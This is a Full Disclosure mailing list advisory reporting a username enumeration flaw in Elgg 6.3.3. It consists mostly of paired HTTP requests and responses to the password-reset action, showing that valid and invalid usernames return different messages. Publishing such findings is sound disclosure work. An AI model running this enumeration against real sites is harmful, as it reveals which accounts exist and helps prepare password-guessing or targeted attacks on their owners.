[FD] Username Enumeration - elggv6.3.3

Andrey Stoykov Thu, 29 Jan 2026 13:47:00 -0800

# Exploit Title: Elgg - Username Enumeration
# Date: 1/2026
# Exploit Author: Andrey Stoykov
# Version: 6.3.3
# Tested on: Ubuntu 22.04
# Blog:
https://msecureltd.blogspot.com/2026/01/friday-fun-pentest-series-47-lack-of.html


// HTTP Request - Resetting Password - Valid User

POST /action/user/requestnewpassword HTTP/1.1
Host: elgg.local
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:148.0)
Gecko/20100101 Firefox/148.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-GB,en;q=0.9
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded
Content-Length: 71
Origin: http://elgg.local
Sec-GPC: 1
Connection: keep-alive
Referer: http://elgg.local/forgotpassword
Cookie: Elgg=3v9mqlh8vai2f9hemfo7iqttt6
Upgrade-Insecure-Requests: 1
Priority: u=0, i

__elgg_token=2Cpt0GyVW9swhLkm5PggkQ&__elgg_ts=1769264047&username=admin

// HTTP Response - Resetting Password - Valid User

HTTP/1.1 302 Found
Date: Sat, 24 Jan 2026 14:14:43 GMT
Server: Apache/2.4.52 (Ubuntu)
Cache-Control: must-revalidate, no-cache, no-store, private
expires: Thu, 19 Nov 1981 08:52:00 GMT
pragma: no-cache
Location: http://elgg.local/
Vary: User-Agent
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 318

<!DOCTYPE html>
<html>
    <head>
        <meta charset="UTF-8" />
        <meta http-equiv="refresh" content="0;url='http://elgg.local/'" />

        <title>Redirecting to http://elgg.local/</title>
    </head>
    <body>
        Redirecting to <a href="http://elgg.local/";>http://elgg.local/</a>.
    </body>
</html>

// HTTP Request - Following Redirection - Valid User

GET / HTTP/1.1
Host: elgg.local
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:148.0)
Gecko/20100101 Firefox/148.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-GB,en;q=0.9
Accept-Encoding: gzip, deflate, br
Origin: http://elgg.local
Sec-GPC: 1
Connection: keep-alive
Referer: http://elgg.local/action/user/requestnewpassword
Cookie: Elgg=3v9mqlh8vai2f9hemfo7iqttt6
Upgrade-Insecure-Requests: 1
Priority: u=0, i

// HTTP Response - Following Redirection - Valid User

HTTP/1.1 200 OK
Date: Sat, 24 Jan 2026 14:14:46 GMT
Server: Apache/2.4.52 (Ubuntu)
Cache-Control: must-revalidate, no-cache, no-store, private
x-frame-options: SAMEORIGIN
expires: Thu, 19 Nov 1981 08:52:00 GMT
pragma: no-cache
x-content-type-options: nosniff
Vary: Accept-Encoding,User-Agent
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 20646

[...]
<div class="elgg-message elgg-message-success"><div class="elgg-inner"><div
class="elgg-body">Successfully requested a new password, email
sent</div></div></div>
[...]

// HTTP Request - Resetting Password - Invalid User

POST /action/user/requestnewpassword HTTP/1.1
Host: elgg.local
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:148.0)
Gecko/20100101 Firefox/148.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-GB,en;q=0.9
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded
Content-Length: 67
Origin: http://elgg.local
Sec-GPC: 1
Connection: keep-alive
Referer: http://elgg.local/forgotpassword
Cookie: Elgg=3v9mqlh8vai2f9hemfo7iqttt6
Upgrade-Insecure-Requests: 1
Priority: u=0, i

__elgg_token=2Cpt0GyVW9swhLkm5PggkQ&__elgg_ts=1769264047&username=x


// HTTP Response - Resetting Password - Invalid User

HTTP/1.1 302 Found
Date: Sat, 24 Jan 2026 14:15:07 GMT
Server: Apache/2.4.52 (Ubuntu)
Cache-Control: must-revalidate, no-cache, no-store, private
expires: Thu, 19 Nov 1981 08:52:00 GMT
pragma: no-cache
Location: http://elgg.local/forgotpassword
Vary: User-Agent
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 374

<!DOCTYPE html>
<html>
    <head>
        <meta charset="UTF-8" />
        <meta http-equiv="refresh" content="0;url='
http://elgg.local/forgotpassword'" />

        <title>Redirecting to http://elgg.local/forgotpassword</title>
    </head>
    <body>
        Redirecting to <a href="http://elgg.local/forgotpassword";>
http://elgg.local/forgotpassword</a>.
    </body>
</html>

// HTTP Request - Following Redirection - Invalid User

GET /forgotpassword HTTP/1.1
Host: elgg.local
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:148.0)
Gecko/20100101 Firefox/148.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-GB,en;q=0.9
Accept-Encoding: gzip, deflate, br
Origin: http://elgg.local
Sec-GPC: 1
Connection: keep-alive
Referer: http://elgg.local/action/user/requestnewpassword
Cookie: Elgg=3v9mqlh8vai2f9hemfo7iqttt6
Upgrade-Insecure-Requests: 1
Priority: u=0, i

// HTTP Response - Following Redirection - Invalid User

HTTP/1.1 200 OK
Date: Sat, 24 Jan 2026 14:15:09 GMT
Server: Apache/2.4.52 (Ubuntu)
Cache-Control: must-revalidate, no-cache, no-store, private
x-frame-options: SAMEORIGIN
expires: Thu, 19 Nov 1981 08:52:00 GMT
pragma: no-cache
x-content-type-options: nosniff
Vary: Accept-Encoding,User-Agent
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 19681

[...]
<div class="elgg-message elgg-message-error"><div class="elgg-inner"><div
class="elgg-body">Username x not found.</div></div></div>
[...]
_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: https://seclists.org/fulldisclosure/

[FD] Username Enumeration - elggv6.3.3

Reply via email to